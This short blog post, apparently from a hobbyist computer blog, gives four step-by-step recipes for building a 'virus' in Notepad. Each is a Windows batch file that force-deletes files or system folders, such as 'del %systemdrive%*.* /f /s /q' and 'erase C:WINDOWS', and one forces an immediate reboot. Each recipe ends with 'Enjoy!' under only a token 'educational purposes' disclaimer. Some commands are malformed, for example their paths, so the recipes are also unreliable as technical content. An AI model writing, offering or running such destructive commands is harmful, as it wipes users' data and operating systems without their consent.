How to make a powerfull virus on Notepad.
This information is for educational purposes only don't be a jerk and try this out I will not be held responsible if any damage occurs to anything.
Step 1: Go to Start
Step 2: Type in Notepad
Step 3: Copy and Paste the following into notepad: DEL /F /Q *
Step 4: Save this as: "Virus.cmd" (with out quotation marks you must have .cmd)
Step 5: Don't open it. It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
Step 6: Enjoy!
How to make a Virus that deletes the WINDOWS file
Step 1: Go to Start
Step 2: Type in Notepad. Hit enter
Step 3: Copy and paste the following: erase C:WINDOWS
Step 4: Save as: Cancel.cmd (you must have the .cmd)
Step 5: Don't Open it. It will DELETE your windows and then you have to reinstall it.
Step 6: Enjoy!
Another way...
Step 1: Open up notepad
Step 2: Copy and paste the following:
@echo off
del C:/Program Files
del C:/Documents and Settings
del C:/WINDOWS
echo Windows has Comitted Suicide
pause
Step 3: Save it as: Anything.cmd
Another way...
Step 1: Open up Notepad
Step 2: Copy and paste the Following:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Step 3: Save it as: whateveryouwant.cmd
- JMD Computer Keep Comment
Source:- http://www.stuffyouneedtoknow.page.tl/How-to-make-a-virus.htm
0 comments:
Post a Comment